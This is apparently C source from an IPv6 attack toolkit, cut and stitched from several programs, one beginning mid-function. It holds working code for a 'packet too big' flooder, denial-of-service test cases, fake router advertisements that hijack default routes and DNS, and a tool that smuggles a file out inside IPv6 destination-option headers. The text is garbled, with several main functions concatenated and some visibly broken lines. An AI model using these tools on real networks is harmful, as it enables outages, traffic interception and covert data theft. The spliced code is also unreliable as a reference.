buf[i++] = (plife % 65536) / 256;
buf[i++] = plife % 256;
buf[i++] = (plife / 2) / 16777216;
buf[i++] = ((plife / 2) % 16777216) / 65536;
buf[i++] = ((plife / 2) % 65536) / 256;
buf[i++] = (plife / 2) % 256;
i += 4; // + 4 bytes reserved
memcpy(&buf[i], (char *) &pbuf[j][1], 16);
i += 16;
}
// route option, put all in
if (rcnt > 0)
for (j = 0; j < rcnt; j++) {
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = rbuf[j][0]; // prefix length
if (prio == 2)
buf[i++] = 0x08; // priority, highest of course
else if (prio == 1)
buf[i++] = 0x00;
else if (prio == 0)
buf[i++] = 0x18;
else
buf[i++] == 0x10;
buf[i++] = rlife / 16777216;
buf[i++] = (rlife % 16777216) / 65536;
buf[i++] = (rlife % 65536) / 256;
buf[i++] = rlife % 256;
memcpy((char *) &buf[i], (char *) &rbuf[j][1], 16); // network
i += 16;
}
// dns option
if (dcnt > 0)
for (j = 0; j < dcnt; j++) {
buf[i++] = 0x19; // dns option type
buf[i++] = 0x03; // length
i += 2; // reserved
buf[i++] = dlife / 16777216;
buf[i++] = (dlife % 16777216) / 65536;
buf[i++] = (dlife % 65536) / 256;
buf[i++] = dlife % 256;
memcpy(buf + i, dbuf[j], 16); // dns server
i += 16;
}
// dns searchlist option
if (searchlist != NULL) {
buf[i] = 31;
buf[i + 4] = dlife / 16777216;
buf[i + 5] = (dlife % 16777216) / 65536;
buf[i + 6] = (dlife % 65536) / 256;
buf[i + 7] = dlife % 256;
if (searchlist[strlen(searchlist) - 1] == '.')
searchlist[strlen(searchlist) - 1] = 0;
m = 0;
while ((ptr = strstr(searchlist, ".,")) != NULL) {
m = strlen(ptr);
for (l = 1; l < m; l++)
ptr[l - 1] = ptr[l];
ptr[m - 1] = 0;
}
l = 0;
m = 0;
j = strlen(searchlist);
do {
k = 0;
ptr = index(&searchlist[l], '.');
if (ptr == NULL || (index(&searchlist[l], ',') != NULL && (char*)ptr > (char*)index(&searchlist[l], ','))) {
k = 1;
ptr = index(&searchlist[l], ',');
}
if (ptr != NULL)
*ptr = 0;
n = strlen(&searchlist[l]);
buf[i + 8 + m] = n;
memcpy(&buf[i + 8 + m + 1], &searchlist[l], n);
if (ptr == NULL)
l = j;
else
l += 1 + n;
m += 1 + n;
if (k || ptr == NULL)
m++; // end of domain entry
} while (l < j && ptr != NULL);
if (m % 8 > 0)
m = ( (m / 8) + 1 ) * 8;
buf[i + 1] = m/8 + 1;
i += m + 8;
}
frbuflen = i;
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
return -1;
if (do_hop) {
type = NXT_HBH;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
return -1;
}
if (do_frag) {
type = NXT_FRAG;
for (j = 0; i < do_frag; j++)
if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, getpid() + (cnt++ << 16)) < 0)
return -1;
}
if (do_dst) {
if (type == NXT_ICMP6)
type = NXT_DST;
if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
return -1;
}
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, llife, buf, i, 0) < 0)
return -1;
if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
return -1;
frhdr = (thc_ipv6_hdr *) pkt;
//printf("DEBUG: RA size is %d bytes, do_dst %d, do_overlap %d\n", i + 8, do_dst, do_overlap);
// init pcap
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
printf("Starting to advertise router (Press Control-C to end) ...\n");
while (sent < to_send || to_send > 255) {
if (do_dst) {
thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232);
} else if (do_overlap) {
if (do_overlap == 1)
thc_send_as_overlapping_first_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
else
thc_send_as_overlapping_last_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1232, 0);
} else {
thc_send_pkt(interface, pkt, &pkt_len);
}
while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
sent++;
if (sent != to_send || to_send > 255)
sleep(interval);
}
return 0; // never reached
}
int main(int argc, char *argv[]) {
char *interface, *ptr, buf2[8];
unsigned char *dst = NULL, *dstmac = NULL, *src = NULL, *srcmac = NULL;
int i, offset = 14, type = ICMP6_TOOBIG, alert = 0, randsrc = 0, do_crc = 1, maxsize = 160;
unsigned char *pkt = NULL, ip6[8];
int pkt_len = 0, count = 0;
thc_ipv6_hdr *hdr;
unsigned int filler = IDS_STRING, mychecksum;
unsigned char offender[1452] = { 0x60, 0x00, 0x00, 0x00, 0x01, 0xcd, 0x3a, 0x3f,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0x20, 0x03, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04,
0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04,
0x80, 0x00, 0xed, 0xc5, 0xfa, 0xce, 0xba, 0xbe,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 };
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
srand(time(NULL) + getpid());
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
while ((i = getopt(argc, argv, "acpPTUrRs:m")) >= 0) {
switch(i) {
case 'a':
alert = 8;
break;
case 'c':
do_crc = 0;
break;
case 'm':
maxsize = -1;
break;
case 'p':
type = ICMP6_ECHOREQUEST;
break;
case 'P':
type = ICMP6_ECHOREPLY;
break;
case 'T':
type = ICMP6_TTLEXEED;
break;
case 'U':
type = ICMP6_UNREACH;
break;
case 'r':
randsrc = 8;
break;
case 'R':
randsrc = 1;
break;
case 's':
src = thc_resolve6(optarg);
break;
default:
fprintf(stderr, "Error: unknown option -%c\n", i);
exit(-1);
}
}
if (argc - optind < 2)
help(argv[0]);
interface = argv[optind];
if ((ptr = index(argv[optind + 1], '/')) != NULL)
*ptr = 0;
if ((dst = thc_resolve6(argv[optind + 1])) == NULL) {
fprintf(stderr, "Error: Can not resolve %s\n", argv[optind + 1]);
exit(-1);
}
if ((srcmac = thc_get_own_mac(interface)) == NULL) {
fprintf(stderr, "Error: invalid interface %s\n", interface);
exit(-1);
}
if (src == NULL)
if ((src = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL)) == NULL || (src[0] == 0xfe && src[1] == 0x80)) {
fprintf(stderr, "Error: no global IPv6 address configured on interface %s\n", interface);
exit(-1);
}
if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) {
fprintf(stderr, "Error: can not find a route to target %s\n", argv[2]);
exit(-1);
}
if (maxsize == -1)
maxsize = thc_get_mtu(interface) - 48 - alert;
if (maxsize > sizeof(offender))
maxsize = sizeof(offender);
for (i = 0; i < ((sizeof(offender) - 48) / 4); i++)
memcpy(offender + 48 + i*4, (char*) &filler + _TAKE4, 4);
memcpy(offender + 8, dst, 16);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 255, 0, 0, 0, 0)) == NULL)
return -1;
if (alert) {
memset(buf2, 0, sizeof(buf2));
buf2[0] = 5;
buf2[1] = 2;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, 6) < 0)
return -1;
}
if (thc_add_icmp6(pkt, &pkt_len, type, 0, 1280, offender, maxsize, 0) < 0)
return -1;
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
hdr = (thc_ipv6_hdr *) pkt;
if (do_hdr_size)
offset = do_hdr_size;
printf("Starting to flood target network with toobig %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface);
while (1) {
for (i = 4; i < 8; i++)
ip6[i] = rand() % 256;
memcpy(hdr->pkt + offset + 32 + 4, ip6 + 4, 4);
memcpy(hdr->pkt + offset + 40 + 8 + 8 + 8 + 4 + alert, ip6 + 4, 4);
if (randsrc) {
for (i = randsrc; i < 16; i++)
hdr->pkt[offset + 8 + i] = rand() % 256;
}
if (do_crc) {
hdr->pkt[offset + 42 + alert] = 0;
hdr->pkt[offset + 43 + alert] = 0;
mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40 + alert, pkt_len - offset - 40 - alert);
hdr->pkt[offset + 42 + alert] = mychecksum / 256;
hdr->pkt[offset + 43 + alert] = mychecksum % 256;
}
while (thc_send_pkt(interface, pkt, &pkt_len) < 0)
usleep(1);
count++;
if (count % 1000 == 0)
printf(".");
}
return 0;
}
int main(int argc, char *argv[]) {
int test = 0, count = 1, tmplen;
unsigned char buf[65536], bla[1500], tests[256];
unsigned char *dst6, *ldst6 = malloc(16), *src6, *lsrc6, *mcast6, *route6, *mal;
unsigned char *srcmac = NULL, *dstmac = NULL, *routers[2], null_buffer[6];
thc_ipv6_hdr *hdr;
int i, j, k, srcmtu, fragsize;
unsigned char *pkt = NULL, *pkt2 = NULL, *pkt3 = NULL;
int pkt_len = 0, pkt_len2 = 0, pkt_len3 = 0, noping = 0, mtu = 1500;
char *interface;
thc_ipv6_hdr *ipv6;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
if (strcmp(argv[1], "-r") == 0) {
thc_ipv6_rawmode(1);
rawmode = 1;
argv++;
argc--;
}
interface = argv[1];
if ((dst6 = thc_resolve6(argv[2])) == NULL) {
fprintf(stderr, "Error: invalid target: %s\n", argv[2]);
exit(-1);
}
//route6 = thc_resolve6("2a01::");
memcpy(ldst6, dst6, 16);
memset(ldst6 + 2, 0, 6);
ldst6[0] = 0xfe;
ldst6[1] = 0x80;
mcast6 = thc_resolve6("ff02::1");
if (argc >= 4)
test = atoi(argv[3]);
memset(null_buffer, 0, sizeof(null_buffer));
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
if ((lsrc6 = thc_get_own_ipv6(interface, ldst6, PREFER_LINK)) == NULL) {
fprintf(stderr, "Error: invalid interface: %s\n", interface);
exit(-1);
}
srcmac = thc_get_own_mac(interface);
if (rawmode == 0) {
if ((dstmac = thc_get_mac(interface, src6, dst6)) == NULL) {
fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]);
exit(-1);
}
} else
dstmac = null_buffer;
if ((srcmtu = thc_get_mtu(interface)) <= 0) {
fprintf(stderr, "ERROR: can not get mtu from interface %s\n", interface);
exit(-1);
}
fragsize = ((srcmtu - 62) / 8) * 8;
setvbuf(stdout, NULL, _IONBF, 0);
memset(buf, 0, sizeof(buf));
memset(tests, 0, sizeof(tests));
memset(bla, 0, sizeof(bla));
if (test < 1 || test > MAX_TEST) {
printf("%s %s (c) 2013 by %s %s\n\n", argv[0], VERSION, AUTHOR, RESOURCE);
printf("Syntax: %s interface destination test-case-number\n\n", argv[0]);
printf("The following test cases are currently implemented:\n");
printf(" 1 : large hop-by-hop header with router-alert and filled with unknown options\n");
printf(" 2 : large destination header filled with unknown options\n");
exit(0);
}
printf("Performing denial of service test case no. %d attack on %s via %s:\n", test, argv[2], argv[1]);
printf("A \".\" is shown for every 1000 packets sent, press Control-C to end...\n");
/********************** TEST CASES ************************/
if (test == count) { // 1432
printf("Test %d: large hop-by-hop header with router-alert and filled with unknown options.\n", count);
printf("WARNING: this attack affects all routers on the network path to the target!!\n");
sleep(3);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
buf[0] = 5;
buf[1] = 2;
j = 4;
i = 2;
while (j <= 1408) {
k = (i % 63) + 1;
buf[j] = k;
switch (k) {
case 38: // quickstart
buf[j + 1] = 6; // length
buf[j + 2] = 1; // request type + rate
buf[j + 3] = 60; //qs-ttl
buf[j + 4] = 8; // nonce
j += 8;
break;
case 5: // prevent router alert option twice
buf[j] = 1;
// fall through
default:
buf[j + 1] = 2;
j += 4;
}
j += buf[j + 1] + 2;
i++;
}
for (i = 1; i < 236; i++) {
buf[i * 6 - 2] = (i % 63) + 1;
buf[i * 6 - 1] = 4;
}
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf, 1416) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) { // 1432
printf("Test %d: large destination header filled with unknown options.\n", count);
if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 255, 0, 0, 0, 0)) == NULL)
return -1;
for (i = 1; i < 237; i++) {
buf[6 + i * 6] = (i % 63) + 1;
buf[5 + i * 6] = 4;
}
if (thc_add_hdr_dst(pkt, &pkt_len, buf, 1416) < 0)
return -1;
thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, bla, 8, 0);
if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0)
return -1;
}
count++;
if (test == count) { // 1432
// code
}
count++;
/******************* END OF TESTCASES ***************************/
count = 0;
while (1) {
thc_send_pkt(interface, pkt, &pkt_len);
usleep(1);
count++;
if (count % 1000 == 0)
printf(".");
}
return 0;
}
int main(int argc, char *argv[]) {
unsigned char *pkt1 = NULL, rbuf[3570], wbuf[3570], buf[4000];
unsigned char *src6 = NULL, *dst6 = NULL, srcmac[6] = "", *mac = srcmac, *dmac;
int pkt1_len = 0, flags = 0, i = 0, mtu = 0, bytes, seq = 0, id, rounds, wbytes, bufsize = 0, send = 2, num = 0;
char *interface, *key = NULL, hash[20], vec[8] = { 0, 0, 0, 0, 0, 0, 0, 0 };;
int rawmode = 0, tcp_port = -1;
FILE *f;
BF_KEY bfkey;
if (argc < 4 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "rm:k:s:")) >= 0) {
switch (i) {
case 'r':
rawmode = 1;
thc_ipv6_rawmode(1);
break;
case 'k':
key = optarg;
break;
case 'm':
mtu = atoi(optarg);
break;
case 's':
send = atoi(optarg);
break;
default:
exit(-1);
}
}
if (argc < optind + 2) {
fprintf(stderr, "Error: Not enough parameters!\n");
help(argv[0]);
}
interface = argv[optind];
dst6 = thc_resolve6(argv[optind + 1]);
if ((f = fopen(argv[optind + 2], "r")) == NULL) {
fprintf(stderr, "Error: file %s not found\n", argv[optind + 2]);
exit(-1);
}
if (argc >= optind + 4 && argv[optind + 3] != NULL)
tcp_port = atoi(argv[optind + 3]);
if (mtu == 0)
mtu = thc_get_mtu(interface);
if (mtu <= 1000) {
fprintf(stderr, "Error: MTU of interface %s must be at least 1000 bytes\n", interface);
exit(-1);
}
mac = thc_get_own_mac(interface);
src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL);
if ((dmac = thc_get_mac(interface, src6, dst6)) == NULL) {
fprintf(stderr, "Error: can not get MAC for target\n");
exit(-1);
}
srand(getpid());
mtu -= 128;
if (mtu % 255 == 0)
i = 2 * (mtu / 255);
else
i = 2 + 2 * (mtu / 255);
mtu = mtu - i;
if ((mtu + i + 14) % 8 > 0)
mtu = (((mtu + i + 14) / 8) * 8) - (i + 14);
if (mtu > 14 * 255)
mtu = 14 * 255;
if (key != NULL) {
memset(&bfkey, 0, sizeof(bfkey));
SHA1((unsigned char *) key, strlen(key), (unsigned char *) hash);
BF_set_key(&bfkey, sizeof(hash), (unsigned char *) hash);
memset(vec, 0, sizeof(vec));
num = 0;
}
id = rand();
buf[0] = 16;
buf[1] = 4;
memcpy(buf + 2, (char *) &id, 4);
buf[6] = 17;
buf[7] = 4;
while ((bytes = fread(rbuf, 1, mtu, f)) > 0) {
seq++;
if (key != NULL) {
BF_cfb64_encrypt((unsigned char *) rbuf, (unsigned char *) wbuf, bytes, &bfkey, (unsigned char *) vec, &num, BF_ENCRYPT);
memcpy(rbuf, wbuf, bytes);
}
memcpy(buf + 8, (char *) &seq, 4);
bufsize = 12;
rounds = bytes / 255;
for (i = 0; i <= rounds; i++) {
buf[bufsize] = i + 18;
if (i == rounds)
wbytes = bytes % 255;
else
wbytes = 255;
buf[bufsize + 1] = wbytes;
memcpy(buf + bufsize + 2, rbuf + 255 * i, wbytes);
bufsize += wbytes + 2;
}
if (bytes < mtu) {
buf[bufsize] = 0x1f;
buf[bufsize + 1] = 0;
bufsize = bufsize + 2;
}
if ((pkt1 = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt1_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL)
return -1;
if (thc_add_hdr_dst(pkt1, &pkt1_len, buf, bufsize))
return -1;
if (tcp_port == -1) {
if (thc_add_icmp6(pkt1, &pkt1_len, ICMP6_ECHOREQUEST, 0, flags, NULL, 0, 0) < 0)
return -1;
} else {
if (thc_add_tcp(pkt1, &pkt1_len, (rand() % 45536) + 10000, tcp_port, rand(), 0, TCP_SYN, 5760, 0, NULL, 0, NULL, 0) < 0)
return -1;
}
if (thc_generate_pkt(interface, mac, dmac, pkt1, &pkt1_len) < 0) {
fprintf(stderr, "Error: Can not generate packet, exiting ...\n");
exit(-1);
}
printf("Sending packet seq# %d\n", seq);
for (i = 0; i < send; i++) {
thc_send_pkt(interface, pkt1, &pkt1_len);
usleep(100);
}
}
printf("All sent.\n");
return 0;
}
int main(int argc, char *argv[]) {
char *routerip, *interface, mac[16] = "";
unsigned char *routerip6, *route6, *mac6 = mac, *ip6;
unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2";
unsigned char *dst = thc_resolve6("ff02::1");
unsigned char *dstmac = thc_get_multicast_mac(dst);
unsigned char *dns;
int size, mtu = 1500, i, j, k, cnt;
unsigned char *pkt = NULL;
int pkt_len = 0;
int rawmode = 0;
pcap_t *p;
if (argc < 3 || strncmp(argv[1], "-h", 2) == 0)
help(argv[0]);
while ((i = getopt(argc, argv, "FHDr")) >= 0) {
switch (i) {
case 'r':
thc_ipv6_rawmode(1);
rawmode = 1;
break;
case 'F':
do_frag++;
break;
case 'H':
do_hop = 1;
break;
case 'D':
do_dst = 1;
break;
default:
fprintf(stderr, "Error: invalid option %c\n", i);
exit(-1);
}
}
if (argc - optind < 2)
help(argv[0]);
if (do_hdr_size)
myoff = do_hdr_size;
frbuf = buf;
frbuf2 = buf2;
frbuf2len = sizeof(buf2);
memset(mac, 0, sizeof(mac));
interface = argv[optind];
mtu = thc_get_mtu(interface);
if (argc - optind >= 5)
mtu = atoi(argv[optind + 4]);
if (argc - optind >= 7 && (ptr = argv[optind + 5]) != NULL)
sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4],
(unsigned int *) &mac[5]);
else
mac6 = thc_get_own_mac(interface);
if (argc - optind >= 4 && argv[optind + 3] != NULL)
ip6 = thc_resolve6(argv[optind + 3]);
else
ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK);
frip6 = ip6;
frint = interface;
frmac = mac6;
if (argc - optind >= 4 && argv[optind + 2] != NULL)
dns = thc_resolve6(argv[optind + 2]);
else
dns = thc_resolve6("ff02::fb");
routerip = argv[optind + 1];
if (routerip == NULL || (ptr = index(routerip, '/')) == NULL) {
printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n");
exit(-1);
}
*ptr++ = 0;
size = atoi(ptr);
routerip6 = thc_resolve6(routerip);
route6 = thc_resolve6(routerip);
if (routerip6 == NULL || size < 1 || size > 128) {
fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[optind + 1]);
exit(-1);
}
if (size < 48 || size > 64)
fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size);
if (dns == NULL) {
fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[optind + 2]);
exit(-1);
}
if (ip6 == NULL) {
fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[optind + 3]);
exit(-1);
}
if (mtu < 1 || mtu > 65536) {
fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[optind + 4]);
exit(-1);
}
if (mtu < 1228 || mtu > 1500)
fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu);
if (mac6 == NULL) {
fprintf(stderr, "Error: mac address in invalid\n");
exit(-1);
}
memset(buf, 0, sizeof(buf));
memset(buf2, 0, sizeof(buf2));
memset(buf3, 0, sizeof(buf3));
if ((p = thc_pcap_init(interface, string)) == NULL) {
fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string);
exit(-1);
}
i = 128 - size;
j = i / 8;
k = i % 8;
if (k > 0)
j++;
memset(route6 + 16 - j, 0, j);
if (k > 0)
route6[17 - j] = (route6[17 - j] >> (8 - k)) << (8 - k);
// buf[3] = 250; // 0-3: reachable timer
buf[6] = 4; // 4-7: retrans timer
// option mtu
buf[8] = 5;
buf[9] = 1;
buf[12] = mtu / 16777216;
buf[13] = (mtu % 16777216) / 65536;
buf[14] = (mtu % 65536) / 256;
buf[15] = mtu % 256;
// option prefix
buf[16] = 3;
buf[17] = 4;
buf[18] = size; // prefix length
buf[19] = 128 + 64;
memset(&buf[20], 17, 4);
memset(&buf[24], 4, 4);
memcpy(&buf[32], route6, 16);
i = 48;
// mac address option
buf[i++] = 1;
buf[i++] = 1;
memcpy(buf + i, mac6, 6);
i += 6;
// default route routing option
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x00; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
i += 16; // 56-71 address, all zeros for default
// specific route routing option 2000::/3
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x03; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x20; // 56-71 address: 2000::
i += 15;
// specific route routing option 2000::/3
buf[i++] = 0x18; // routing entry option type
buf[i++] = 0x03; // length 3 == 24 bytes
buf[i++] = 0x07; // prefix length
buf[i++] = 0x08; // priority, highest of course
i += 2; // 52-53 unknown
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0x11; // lifetime, word
buf[i++] = 0xfc; // 56-71 address: fc::
i += 15;
// dns option
buf[i++] = 0x19; // dns option type
buf[i++] = 0x03; // length
i += 2; // 74-75 reserved
memset(buf + i, 1, 4); // validity time
i += 4;
memcpy(buf + i, dns, 16); // dns server
i += 16;
frbuflen = i;
if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL)
return -1;
if (do_hop) {
type = NXT_HBH;
if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0)
return -1;
}
if (do_frag) {
type = NXT_FRAG;
for (i = 0; i <= do_frag; i++)
if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0)
return -1;
}
if (do_dst) {
if (type == NXT_ICMP6)
type = NXT_DST;
if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0)
return -1;
}
if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0)
return -1;
if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0)
return -1;
frhdr = (thc_ipv6_hdr *) pkt;
// init pcap
printf("Starting to advertise router %s (Press Control-C to end) ...\n", argv[optind + 1]);
while (1) {
if (do_dst) {
thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240);
} else {
thc_send_pkt(interface, pkt, &pkt_len);
}
while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0);
sleep(5);
}
return 0;
}
